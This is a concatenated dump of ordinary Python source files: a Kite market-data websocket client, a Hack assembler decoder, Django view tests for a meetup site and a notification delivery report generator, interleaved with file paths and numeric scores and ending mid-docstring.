print("-", line.lstrip("_"))
_django_debug = os.environ.get("DJANGO_DEBUG", False)
# bootstrapping is hard. environ-config can't handle this use-case
if _env_to_bool(_django_debug):
# The dotenv package is installed only in a dev environment
from dotenv import load_dotenv
print("Loading environment variables from .env file")
print()
load_dotenv()
try:
config = NoeConfig.from_environ()
except Exception as exc:
print_config_schema()
print()
print("Error during loading environment variable:")
exc_message = f"{exc.__class__.__name__}: {exc}"
print(textwrap.indent(exc_message, " "))
sys.exit(1) | 0.322206 | 0.077588 |
import six
import asyncio
import struct
import json
from autobahn.asyncio.websocket import WebSocketClientProtocol, \
WebSocketClientFactory
class TickerClientProtocol(WebSocketClientProtocol):
""" Kite ticker autobahn WebSocket base protocol """
def onConnect(self, response):
"""
Called when WebSocket server connection is established successfully
"""
self.factory.ws = self
self.factory.on_connect(self, response)
def onOpen(self):
"""
Called when the initial WebSocket opening handshake was completed
"""
print("WebSocket connection open.")
def onMessage(self, payload, isBinary):
"""
Called when text or payload is received.
"""
if self.factory.on_message:
self.factory.on_message(self, payload, isBinary)
def onClose(self, wasClean, code, reason):
"""
Called when connection is closed
"""
print("WebSocket connection closed: {0}".format(reason))
class TickerClientFactory(WebSocketClientFactory):
"""
Implement custom call backs for WebSocketClientFactory
"""
def __init__(self, *args, **kwargs):
"""
Initialize with callback methods
"""
self.ws = None
self.on_message = None
self.on_connect = None
super(TickerClientFactory, self).__init__(*args, **kwargs)
class MainTicker():
"""
Main Ticker client
"""
# Exchange map for ticker
EXCHANGE_MAP = {
"nse": 1,
"nfo": 2,
"cds": 3,
"bse": 4,
"bfo": 5,
"bsecds": 6,
"mcx": 7,
"mcxsx": 8,
"indices": 9
}
# Available streaming modes.
MODE_FULL = "full"
MODE_QUOTE = "quote"
MODE_LTP = "ltp"
def __init__(self, api_key, access_token):
"""
Initialise websocket client
"""
self.ws_url = "wss://ws.kite.trade?api_key={}&access_token={}".format(api_key, access_token)
# Placeholders for callbacks.
self.on_ticks = None
self.on_connect = None
self.on_message = None
def connect_ws(self):
"""
Establish ws connection
"""
self.factory = TickerClientFactory(self.ws_url)
self.factory.protocol = TickerClientProtocol
self.ws = self.factory.ws
# Register private callback
self.factory.on_connect = self._on_connect
self.factory.on_message = self._on_message
# Run an infinite loop using asyncio
loop = asyncio.get_event_loop()
coro = loop.create_connection(self.factory, "ws.kite.trade", 443, ssl=True)
loop.run_until_complete(coro)
loop.run_forever()
def _on_connect(self, ws, response):
"""
proxy for on_connect
"""
self.ws = ws
if self.on_connect:
self.on_connect(self, response)
def subscribe(self, token_list):
"""
Subscribe to required list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "subscribe", "v": token_list})))
def set_mode(self, mode, token_list):
"""
Set streaming mode for the given list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "mode", "v": [mode, token_list]})))
def _on_message(self, ws, payload, isBinary):
"""
proxy for on_message
"""
if self.on_message:
self.on_message(self, payload, isBinary)
# If the message is binary, parse it and send it to the callback.
if self.on_ticks and isBinary and len(payload) > 4:
self.on_ticks(self, self._parse_binary(payload))
def _parse_binary(self, bin):
"""
Parse binary data to a (list of) ticks structure.
"""
packets = self._split_packets(bin) # split data to individual ticks packet
data = []
for packet in packets:
instrument_token = self._unpack_int(packet, 0, 4)
segment = instrument_token & 0xff # Retrive segment constant from instrument_token
# Add price divisor based on segment
# This factor converts paisa to rupees
if segment == self.EXCHANGE_MAP["cds"]:
divisor = 10000000.0
elif segment == self.EXCHANGE_MAP["bsecds"]:
divisor = 10000.0
else:
divisor = 100.0
# All indices are not tradable
tradable = False if segment == self.EXCHANGE_MAP["indices"] else True
# LTP packets
if len(packet) == 8:
data.append({
"tradable": tradable,
"mode": self.MODE_LTP,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor
})
# Indices quote and full mode
elif len(packet) == 28 or len(packet) == 32:
mode = self.MODE_QUOTE if len(packet) == 28 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"ohlc": {
"high": self._unpack_int(packet, 8, 12) / divisor,
"low": self._unpack_int(packet, 12, 16) / divisor,
"open": self._unpack_int(packet, 16, 20) / divisor,
"close": self._unpack_int(packet, 20, 24) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Full mode with timestamp
if len(packet) == 32:
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 28, 32))
except Exception:
timestamp = None
d["exchange_timestamp"] = timestamp
data.append(d)
# Quote and full mode
elif len(packet) == 44 or len(packet) == 184:
mode = self.MODE_QUOTE if len(packet) == 44 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"last_traded_quantity": self._unpack_int(packet, 8, 12),
"average_traded_price": self._unpack_int(packet, 12, 16) / divisor,
"volume_traded": self._unpack_int(packet, 16, 20),
"total_buy_quantity": self._unpack_int(packet, 20, 24),
"total_sell_quantity": self._unpack_int(packet, 24, 28),
"ohlc": {
"open": self._unpack_int(packet, 28, 32) / divisor,
"high": self._unpack_int(packet, 32, 36) / divisor,
"low": self._unpack_int(packet, 36, 40) / divisor,
"close": self._unpack_int(packet, 40, 44) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Parse full mode
if len(packet) == 184:
try:
last_trade_time = datetime.fromtimestamp(self._unpack_int(packet, 44, 48))
except Exception:
last_trade_time = None
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 60, 64))
except Exception:
timestamp = None
d["last_trade_time"] = last_trade_time
d["oi"] = self._unpack_int(packet, 48, 52)
d["oi_day_high"] = self._unpack_int(packet, 52, 56)
d["oi_day_low"] = self._unpack_int(packet, 56, 60)
d["exchange_timestamp"] = timestamp
# Market depth entries.
depth = {
"buy": [],
"sell": []
}
# Compile the market depth lists.
for i, p in enumerate(range(64, len(packet), 12)):
depth["sell" if i >= 5 else "buy"].append({
"quantity": self._unpack_int(packet, p, p + 4),
"price": self._unpack_int(packet, p + 4, p + 8) / divisor,
"orders": self._unpack_int(packet, p + 8, p + 10, byte_format="H")
})
d["depth"] = depth
data.append(d)
return data
def _unpack_int(self, bin, start, end, byte_format="I"):
"""Unpack binary data as unsgined interger."""
return struct.unpack(">" + byte_format, bin[start:end])[0]
def _split_packets(self, bin):
"""Split the data to individual packets of ticks."""
# Ignore heartbeat data.
if len(bin) < 2:
return []
number_of_packets = self._unpack_int(bin, 0, 2, byte_format="H")
packets = []
j = 2
for i in range(number_of_packets):
packet_length = self._unpack_int(bin, j, j + 2, byte_format="H")
packets.append(bin[j + 2: j + 2 + packet_length])
j = j + 2 + packet_length
return packets | async_ticker.py | import six
import asyncio
import struct
import json
from autobahn.asyncio.websocket import WebSocketClientProtocol, \
WebSocketClientFactory
class TickerClientProtocol(WebSocketClientProtocol):
""" Kite ticker autobahn WebSocket base protocol """
def onConnect(self, response):
"""
Called when WebSocket server connection is established successfully
"""
self.factory.ws = self
self.factory.on_connect(self, response)
def onOpen(self):
"""
Called when the initial WebSocket opening handshake was completed
"""
print("WebSocket connection open.")
def onMessage(self, payload, isBinary):
"""
Called when text or payload is received.
"""
if self.factory.on_message:
self.factory.on_message(self, payload, isBinary)
def onClose(self, wasClean, code, reason):
"""
Called when connection is closed
"""
print("WebSocket connection closed: {0}".format(reason))
class TickerClientFactory(WebSocketClientFactory):
"""
Implement custom call backs for WebSocketClientFactory
"""
def __init__(self, *args, **kwargs):
"""
Initialize with callback methods
"""
self.ws = None
self.on_message = None
self.on_connect = None
super(TickerClientFactory, self).__init__(*args, **kwargs)
class MainTicker():
"""
Main Ticker client
"""
# Exchange map for ticker
EXCHANGE_MAP = {
"nse": 1,
"nfo": 2,
"cds": 3,
"bse": 4,
"bfo": 5,
"bsecds": 6,
"mcx": 7,
"mcxsx": 8,
"indices": 9
}
# Available streaming modes.
MODE_FULL = "full"
MODE_QUOTE = "quote"
MODE_LTP = "ltp"
def __init__(self, api_key, access_token):
"""
Initialise websocket client
"""
self.ws_url = "wss://ws.kite.trade?api_key={}&access_token={}".format(api_key, access_token)
# Placeholders for callbacks.
self.on_ticks = None
self.on_connect = None
self.on_message = None
def connect_ws(self):
"""
Establish ws connection
"""
self.factory = TickerClientFactory(self.ws_url)
self.factory.protocol = TickerClientProtocol
self.ws = self.factory.ws
# Register private callback
self.factory.on_connect = self._on_connect
self.factory.on_message = self._on_message
# Run an infinite loop using asyncio
loop = asyncio.get_event_loop()
coro = loop.create_connection(self.factory, "ws.kite.trade", 443, ssl=True)
loop.run_until_complete(coro)
loop.run_forever()
def _on_connect(self, ws, response):
"""
proxy for on_connect
"""
self.ws = ws
if self.on_connect:
self.on_connect(self, response)
def subscribe(self, token_list):
"""
Subscribe to required list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "subscribe", "v": token_list})))
def set_mode(self, mode, token_list):
"""
Set streaming mode for the given list of tokens
"""
self.ws.sendMessage(six.b(json.dumps({"a": "mode", "v": [mode, token_list]})))
def _on_message(self, ws, payload, isBinary):
"""
proxy for on_message
"""
if self.on_message:
self.on_message(self, payload, isBinary)
# If the message is binary, parse it and send it to the callback.
if self.on_ticks and isBinary and len(payload) > 4:
self.on_ticks(self, self._parse_binary(payload))
def _parse_binary(self, bin):
"""
Parse binary data to a (list of) ticks structure.
"""
packets = self._split_packets(bin) # split data to individual ticks packet
data = []
for packet in packets:
instrument_token = self._unpack_int(packet, 0, 4)
segment = instrument_token & 0xff # Retrive segment constant from instrument_token
# Add price divisor based on segment
# This factor converts paisa to rupees
if segment == self.EXCHANGE_MAP["cds"]:
divisor = 10000000.0
elif segment == self.EXCHANGE_MAP["bsecds"]:
divisor = 10000.0
else:
divisor = 100.0
# All indices are not tradable
tradable = False if segment == self.EXCHANGE_MAP["indices"] else True
# LTP packets
if len(packet) == 8:
data.append({
"tradable": tradable,
"mode": self.MODE_LTP,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor
})
# Indices quote and full mode
elif len(packet) == 28 or len(packet) == 32:
mode = self.MODE_QUOTE if len(packet) == 28 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"ohlc": {
"high": self._unpack_int(packet, 8, 12) / divisor,
"low": self._unpack_int(packet, 12, 16) / divisor,
"open": self._unpack_int(packet, 16, 20) / divisor,
"close": self._unpack_int(packet, 20, 24) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Full mode with timestamp
if len(packet) == 32:
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 28, 32))
except Exception:
timestamp = None
d["exchange_timestamp"] = timestamp
data.append(d)
# Quote and full mode
elif len(packet) == 44 or len(packet) == 184:
mode = self.MODE_QUOTE if len(packet) == 44 else self.MODE_FULL
d = {
"tradable": tradable,
"mode": mode,
"instrument_token": instrument_token,
"last_price": self._unpack_int(packet, 4, 8) / divisor,
"last_traded_quantity": self._unpack_int(packet, 8, 12),
"average_traded_price": self._unpack_int(packet, 12, 16) / divisor,
"volume_traded": self._unpack_int(packet, 16, 20),
"total_buy_quantity": self._unpack_int(packet, 20, 24),
"total_sell_quantity": self._unpack_int(packet, 24, 28),
"ohlc": {
"open": self._unpack_int(packet, 28, 32) / divisor,
"high": self._unpack_int(packet, 32, 36) / divisor,
"low": self._unpack_int(packet, 36, 40) / divisor,
"close": self._unpack_int(packet, 40, 44) / divisor
}
}
# Compute the change price using close price and last price
d["change"] = 0
if(d["ohlc"]["close"] != 0):
d["change"] = (d["last_price"] - d["ohlc"]["close"]) * 100 / d["ohlc"]["close"]
# Parse full mode
if len(packet) == 184:
try:
last_trade_time = datetime.fromtimestamp(self._unpack_int(packet, 44, 48))
except Exception:
last_trade_time = None
try:
timestamp = datetime.fromtimestamp(self._unpack_int(packet, 60, 64))
except Exception:
timestamp = None
d["last_trade_time"] = last_trade_time
d["oi"] = self._unpack_int(packet, 48, 52)
d["oi_day_high"] = self._unpack_int(packet, 52, 56)
d["oi_day_low"] = self._unpack_int(packet, 56, 60)
d["exchange_timestamp"] = timestamp
# Market depth entries.
depth = {
"buy": [],
"sell": []
}
# Compile the market depth lists.
for i, p in enumerate(range(64, len(packet), 12)):
depth["sell" if i >= 5 else "buy"].append({
"quantity": self._unpack_int(packet, p, p + 4),
"price": self._unpack_int(packet, p + 4, p + 8) / divisor,
"orders": self._unpack_int(packet, p + 8, p + 10, byte_format="H")
})
d["depth"] = depth
data.append(d)
return data
def _unpack_int(self, bin, start, end, byte_format="I"):
"""Unpack binary data as unsgined interger."""
return struct.unpack(">" + byte_format, bin[start:end])[0]
def _split_packets(self, bin):
"""Split the data to individual packets of ticks."""
# Ignore heartbeat data.
if len(bin) < 2:
return []
number_of_packets = self._unpack_int(bin, 0, 2, byte_format="H")
packets = []
j = 2
for i in range(number_of_packets):
packet_length = self._unpack_int(bin, j, j + 2, byte_format="H")
packets.append(bin[j + 2: j + 2 + packet_length])
j = j + 2 + packet_length
return packets | 0.59749 | 0.154887 |
import allocate
# Function to decode parsed instruction into it's binary equivalents
def decoder(field1, field2, field3, labels):
binString = ""
if field1.isdigit() and field2 == "" and field3 == "":
binString = toBinary(field1)
elif (field2.isalnum() and field3.isalpha()) or (field1.isalpha() and field2 != "" and field3 == ""):
s = lookUP(field1, field2, field3)
binString = "111" + s
else:
try:
s = lookUPsymbol(field1)
except KeyError:
if field1 in labels:
binString = toBinary(labels[field1])
else:
binString = toBinary(allocate.variable(field1))
except:
binString = "some other error"
else:
binString = s
return binString
# Convert a string value into binary with zero padding
def toBinary(x):
if isinstance(x, str):
intVal = (int)(x)
else:
intVal = x
inbin = "{0:b}".format(intVal)
inbin = inbin.zfill(16)
return inbin
# LOOKUP tables
# JUMP look up table
def lookUPj(jump):
table = { "": "000",
"JGT": "001",
"JEQ": "010",
"JGE": "011",
"JLT": "100",
"JNE": "101",
"JLE": "110",
"JMP": "111"}
return table[jump]
# COMP look up table
def lookUPc(comp):
table = {"0" : "0101010",
"1" : "0111111",
"-1" : "0111010",
"D" : "0001100",
"A" : "0110000",
"!D" : "0001101",
"!A" : "0110001",
"-D" : "0001111",
"-A" : "0110011",
"D+1" : "0011111",
"A+1" : "0110111",
"D-1" : "0001110",
"A-1" : "0110010",
"D+A" : "0000010",
"D-A" : "0010011",
"A-D" : "0000111",
"D&A" : "0000000",
"D|A" : "0010101",
"M" : "1110000",
"!M" : "1110001",
"-M" : "1110011",
"M+1" : "1110111",
"M-1" : "1110010",
"D+M" : "1000010",
"D-M" : "1010011",
"M-D" : "1000111",
"D&M" : "1000000",
"D|M" : "1010101",}
return table[comp]
# DEST look up table
def lookUPd(dest):
table = { "": "000",
"M" : "001",
"D" : "010",
"MD" : "011",
"A" : "100",
"AM" : "101",
"AD" : "110",
"AMD": "111"}
return table[dest]
# Symbol look up table
def lookUPsymbol(symbol):
table = {"R0" : "0000000000000000",
"R1" : "0000000000000001",
"R2" : "0000000000000010",
"R3" : "0000000000000011",
"R4" : "0000000000000100",
"R5" : "0000000000000101",
"R6" : "0000000000000110",
"R7" : "0000000000000111",
"R8" : "0000000000001000",
"R9" : "0000000000001001",
"R10" : "0000000000001010",
"R11" : "0000000000001011",
"R12" : "0000000000001100",
"R13" : "0000000000001101",
"R14" : "0000000000001110",
"R15" : "0000000000001111",
"SCREEN" : "0100000000000000",
"KBD" : "0110000000000000",
"SP" : "0000000000000000",
"LCL" : "0000000000000001",
"ARG" : "0000000000000010",
"THIS" : "0000000000000011",
"THAT" : "0000000000000100"}
return table[symbol]
# Function to return correct sequence of binary strings
def lookUP(dest, comp, jump):
dest = lookUPd(dest)
comp = lookUPc(comp)
jump = lookUPj(jump)
return comp+dest+jump | Project 6/assembler/Decoder.py | import allocate
# Function to decode parsed instruction into it's binary equivalents
def decoder(field1, field2, field3, labels):
binString = ""
if field1.isdigit() and field2 == "" and field3 == "":
binString = toBinary(field1)
elif (field2.isalnum() and field3.isalpha()) or (field1.isalpha() and field2 != "" and field3 == ""):
s = lookUP(field1, field2, field3)
binString = "111" + s
else:
try:
s = lookUPsymbol(field1)
except KeyError:
if field1 in labels:
binString = toBinary(labels[field1])
else:
binString = toBinary(allocate.variable(field1))
except:
binString = "some other error"
else:
binString = s
return binString
# Convert a string value into binary with zero padding
def toBinary(x):
if isinstance(x, str):
intVal = (int)(x)
else:
intVal = x
inbin = "{0:b}".format(intVal)
inbin = inbin.zfill(16)
return inbin
# LOOKUP tables
# JUMP look up table
def lookUPj(jump):
table = { "": "000",
"JGT": "001",
"JEQ": "010",
"JGE": "011",
"JLT": "100",
"JNE": "101",
"JLE": "110",
"JMP": "111"}
return table[jump]
# COMP look up table
def lookUPc(comp):
table = {"0" : "0101010",
"1" : "0111111",
"-1" : "0111010",
"D" : "0001100",
"A" : "0110000",
"!D" : "0001101",
"!A" : "0110001",
"-D" : "0001111",
"-A" : "0110011",
"D+1" : "0011111",
"A+1" : "0110111",
"D-1" : "0001110",
"A-1" : "0110010",
"D+A" : "0000010",
"D-A" : "0010011",
"A-D" : "0000111",
"D&A" : "0000000",
"D|A" : "0010101",
"M" : "1110000",
"!M" : "1110001",
"-M" : "1110011",
"M+1" : "1110111",
"M-1" : "1110010",
"D+M" : "1000010",
"D-M" : "1010011",
"M-D" : "1000111",
"D&M" : "1000000",
"D|M" : "1010101",}
return table[comp]
# DEST look up table
def lookUPd(dest):
table = { "": "000",
"M" : "001",
"D" : "010",
"MD" : "011",
"A" : "100",
"AM" : "101",
"AD" : "110",
"AMD": "111"}
return table[dest]
# Symbol look up table
def lookUPsymbol(symbol):
table = {"R0" : "0000000000000000",
"R1" : "0000000000000001",
"R2" : "0000000000000010",
"R3" : "0000000000000011",
"R4" : "0000000000000100",
"R5" : "0000000000000101",
"R6" : "0000000000000110",
"R7" : "0000000000000111",
"R8" : "0000000000001000",
"R9" : "0000000000001001",
"R10" : "0000000000001010",
"R11" : "0000000000001011",
"R12" : "0000000000001100",
"R13" : "0000000000001101",
"R14" : "0000000000001110",
"R15" : "0000000000001111",
"SCREEN" : "0100000000000000",
"KBD" : "0110000000000000",
"SP" : "0000000000000000",
"LCL" : "0000000000000001",
"ARG" : "0000000000000010",
"THIS" : "0000000000000011",
"THAT" : "0000000000000100"}
return table[symbol]
# Function to return correct sequence of binary strings
def lookUP(dest, comp, jump):
dest = lookUPd(dest)
comp = lookUPc(comp)
jump = lookUPj(jump)
return comp+dest+jump | 0.270191 | 0.323621 |
import json
import os
import unittest
from unittest import mock
from django import test
from django.conf import settings
from django.urls import reverse
import webtest
from config import wsgi
class TestBasicViews(test.TestCase):
def test_code_of_conduct(self):
response = self.client.get(reverse("code-of-conduct"))
self.assertContains(response, "<h1>Code of Conduct</h1>")
def test_coc_redirect(self):
"""The shortcuts '/coc' and '/coc/' paths should redirect to
the code of conduct page."""
response = self.client.get("/coc")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
response = self.client.get("/coc/")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
class TestHomepageMeetupEvents(test.TestCase):
def setUp(self):
fp = os.path.join(os.path.dirname(__file__), "data/meetup-events-api.json")
with open(fp) as fd:
self.api_response = json.load(fd)
self.expected_events = [
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbqb/",
"name": "Saturday Study Group",
"datetime": "2019-10-12T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbzb/",
"name": "Saturday Study Group",
"datetime": "2019-10-19T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/zgtnxqyznbgc/",
"name": "Monthly Meetup",
"datetime": "2019-10-24T19:00:00-07:00",
"venue": "Qualcomm Building Q",
},
]
@mock.patch("pythonsd.views.HomePageView.get_upcoming_events", return_value=[])
def test_no_events(self, mock_call):
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
def test_html_widget(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = True
mock_get.return_value.json.return_value = self.api_response
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
self.assertContains(response, "Qualcomm Building Q")
# Check that it is retreived from the cache
with mock.patch("pythonsd.views.requests.get") as mock_get:
# Return val shouldn't matter - will use cache
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
def test_api_failure(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.side_effect = Exception
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
class TestWSGIApp(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.app = webtest.TestApp(wsgi.application)
def test_admin_login(self):
"""Test that the admin login can be reached through the WSGI App.
This test is mostly to exercise the interface.
"""
response = self.app.get("/admin/login/")
self.assertEqual(response.status_int, 200) | pythonsd/tests/__init__.py | import json
import os
import unittest
from unittest import mock
from django import test
from django.conf import settings
from django.urls import reverse
import webtest
from config import wsgi
class TestBasicViews(test.TestCase):
def test_code_of_conduct(self):
response = self.client.get(reverse("code-of-conduct"))
self.assertContains(response, "<h1>Code of Conduct</h1>")
def test_coc_redirect(self):
"""The shortcuts '/coc' and '/coc/' paths should redirect to
the code of conduct page."""
response = self.client.get("/coc")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
response = self.client.get("/coc/")
self.assertEqual(response.status_code, 302)
self.assertEqual(response.url, "/code-of-conduct/")
class TestHomepageMeetupEvents(test.TestCase):
def setUp(self):
fp = os.path.join(os.path.dirname(__file__), "data/meetup-events-api.json")
with open(fp) as fd:
self.api_response = json.load(fd)
self.expected_events = [
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbqb/",
"name": "Saturday Study Group",
"datetime": "2019-10-12T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/fdzbnqyznbzb/",
"name": "Saturday Study Group",
"datetime": "2019-10-19T12:00:00-07:00",
"venue": "UCSD Geisel Library",
},
{
"link": "https://www.meetup.com/pythonsd/events/zgtnxqyznbgc/",
"name": "Monthly Meetup",
"datetime": "2019-10-24T19:00:00-07:00",
"venue": "Qualcomm Building Q",
},
]
@mock.patch("pythonsd.views.HomePageView.get_upcoming_events", return_value=[])
def test_no_events(self, mock_call):
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
def test_html_widget(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = True
mock_get.return_value.json.return_value = self.api_response
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
self.assertContains(response, "Qualcomm Building Q")
# Check that it is retreived from the cache
with mock.patch("pythonsd.views.requests.get") as mock_get:
# Return val shouldn't matter - will use cache
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "UCSD Geisel Library")
def test_api_failure(self):
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.return_value.ok = False
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
with mock.patch("pythonsd.views.requests.get") as mock_get:
mock_get.side_effect = Exception
response = self.client.get("/")
self.assertContains(response, "There are no upcoming events")
class TestWSGIApp(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.app = webtest.TestApp(wsgi.application)
def test_admin_login(self):
"""Test that the admin login can be reached through the WSGI App.
This test is mostly to exercise the interface.
"""
response = self.app.get("/admin/login/")
self.assertEqual(response.status_int, 200) | 0.578091 | 0.305568 |
from service.models import RoutedNotification, Account
import os
from octopus.lib import clcsv
from copy import deepcopy
from datetime import datetime
from octopus.core import app
def delivery_report(from_date, to_date, reportfile):
"""
Generate the monthly report from from_date to to_date. It is assumed that from_date is
the start of a month, and to_date is the end of a month.
Dates must be strings of the form YYYY-MM-DDThh:mm:ssZ
:param from_date: start of month date from which to generate the report
:param to_date: end of month date up to which to generate the report (if this is not specified, it will default to datetime.utcnow())
:param reportfile: file path for existing/new report to be output
:return:
"""
# work out the whole months that we're operating over
frstamp = datetime.strptime(from_date, "%Y-%m-%dT%H:%M:%SZ")
if to_date is None:
tostamp = datetime.utcnow()
else:
tostamp = datetime.strptime(to_date, "%Y-%m-%dT%H:%M:%SZ")
months = range(frstamp.month, tostamp.month + 1)
# prep the data structures where we're going to record the results
result = {}
uniques = {}
for m in months:
uniques[m] = {"md" : 0, "content" : 0}
heis = {}
# go through each routed notification and count against the repository ids whether something is
# a md-only or a with-content notification, and at the same time count the unique md-only vs with-content
# notifications that were routed
q = DeliveryReportQuery(from_date, to_date)
for note in RoutedNotification.scroll(q.query(), page_size=100, keepalive="5m"):
assert isinstance(note, RoutedNotification)
nm = note.analysis_datestamp.month
is_with_content = False
if len(note.links) > 0:
is_with_content = True
uniques[nm]["content"] += 1
else:
uniques[nm]["md"] += 1
for r in note.repositories:
if r not in result:
result[r] = {}
for m in months:
result[r][m] = {"md" : 0, "content" : 0}
if is_with_content:
result[r][nm]["content"] += 1
else:
result[r][nm]["md"] += 1
# now flesh out the report with account names and totals
for k in result.keys():
acc = Account.pull(k)
if acc is None:
heis[k] = k
else:
if acc.repository_name is not None:
heis[k] = acc.repository_name
else:
heis[k] = k
for mon in result[k].keys():
result[k][mon]["total"] = result[k][mon]["md"] + result[k][mon]["content"]
for mon in uniques.keys():
uniques[mon]["total"] = uniques[mon]["md"] + uniques[mon]["content"]
# some constant bits of information we're going to need to convert the results into a table
# suitable for a CSV
month_names = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']
headers = ['HEI','ID',
'Jan md-only', "Jan with-content", "Jan Total",
'Feb md-only', "Feb with-content", "Feb Total",
'Mar md-only', "Mar with-content", "Mar Total",
'Apr md-only', "Apr with-content", "Apr Total",
'May md-only', "May with-content", "May Total",
'Jun md-only', "Jun with-content", "Jun Total",
'Jul md-only', "Jul with-content", "Jul Total",
'Aug md-only', "Aug with-content", "Aug Total",
'Sep md-only', "Sep with-content", "Sep Total",
'Oct md-only', "Oct with-content", "Oct Total",
'Nov md-only', "Nov with-content", "Nov Total",
'Dec md-only', "Dec with-content", "Dec Total"]
template = {}
for k in headers:
template[k] = 0
# an interim data-structure that we'll use to store the objects to be written, which we
# can then order by the key (which will be the HEI name)
data = {}
# read any existing data in from the current spreadsheet
if os.path.exists(reportfile):
sofar = clcsv.ClCsv(file_path=reportfile)
for obj in sofar.objects():
# convert all the fields to integers as needed
for k in obj.keys():
if k not in ["HEI", "ID"]:
if obj[k] == "":
obj[k] = 0
else:
try:
obj[k] = int(obj[k])
except:
app.logger.warn(u"Unable to coerce existing report value '{x}' to an integer, so assuming it is 0".format(x=obj[k]))
obj[k] = 0
data[obj.get("HEI")] = obj
# now add any new data from the report
for id, res in result.iteritems():
hei = heis.get(id)
if hei not in data:
data[hei] = deepcopy(template)
data[hei]["HEI"] = hei
data[hei]["ID"] = id
for mon, info in res.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data[hei][mdk] = info.get("md")
data[hei][ctk] = info.get("content")
data[hei][tk] = info.get("total")
# remove the "total" and "unique" entries, as we need to re-create them
if "Total" in data:
del data["Total"]
existing_unique = deepcopy(template)
existing_unique["HEI"] = "Unique"
existing_unique["ID"] = ""
if "Unique" in data:
existing_unique = data["Unique"]
del data["Unique"]
# calculate the totals for all columns
totals = {}
for k in headers:
totals[k] = 0
totals["HEI"] = "Total"
totals["ID"] = ""
for hei, obj in data.iteritems():
for k, v in obj.iteritems():
if k in ["HEI", "ID"]:
continue
if isinstance(v, int):
totals[k] += v
data["Total"] = totals
# add the uniques
data["Unique"] = existing_unique
data["Unique"]["HEI"] = "Unique"
for mon, info in uniques.iteritems():
mn = month_names[mon - 1]
mdk = mn + " md-only"
ctk = mn + " with-content"
tk = mn + " Total"
data["Unique"][mdk] = info.get("md")
data["Unique"][ctk] = info.get("content")
data["Unique"][tk] = info.get("total")
orderedkeys = data.keys()
orderedkeys.remove('Unique')
orderedkeys.remove('Total')
orderedkeys.sort()
orderedkeys.append('Total')
orderedkeys.append('Unique')
# remove the old report file, so we can start with a fresh new one
try:
os.remove(reportfile)
except:
pass
out = clcsv.ClCsv(file_path=reportfile)
out.set_headers(headers)
for hk in orderedkeys:
hei = data[hk]
out.add_object(hei)
out.save()
class DeliveryReportQuery(object):
def __init__(self, from_date, to_date):
self.from_date = from_date
self.to_date = to_date
def query(self):
return {
"query" : {
"bool" : {
"must" : [
{
"range" : {
"analysis_date" : {
"gte" : self.from_date,
"lt" : self.to_date
}
}
}
]
}
},
"sort" : [
{"analysis_date" : {"order" : "asc"}}
]
} | service/reports.py | from service.models import RoutedNotification, Account
import os
from octopus.lib import clcsv
from copy import deepcopy
from datetime import datetime
from octopus.core import app
def delivery_report(from_date, to_date, reportfile):
"""
Generate the monthly report from from_date to to_date. It is assumed that from_date is
the start of a month, and to_date is the end of a month.
Dates must be strings of the form YYYY-MM-DDThh:mm:ssZ
:param from_date: start of month date from which to generate the report
